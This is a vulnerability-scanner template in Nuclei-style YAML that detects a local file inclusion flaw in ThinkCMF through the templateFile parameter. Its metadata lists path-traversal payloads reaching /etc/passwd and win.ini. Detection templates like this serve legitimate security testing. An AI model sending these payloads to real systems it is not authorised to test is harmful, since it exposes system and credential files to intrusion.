id: thinkcmf-lfi

info:
  name: ThinkCMF LFI
  author: pikpikcu
  severity: high
  reference: https://www.freebuf.com/vuls/217586.html
  tags: thinkcmf,lfi
  metadata:
    win-payload: "../../../../../../../../../../../../../../../../windows/win.ini"
    unix-payload: "../../../../../../../../../../../../../../../../etc/passwd"

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?a=display&templateFile=README.md"

    matchers-condition: and
    matchers:

      - type: word
        condition: and
        words:
          - "ThinkCMF"
          - "## README"
          - "## UPDATE"

      - type: status
        status:
          - 200
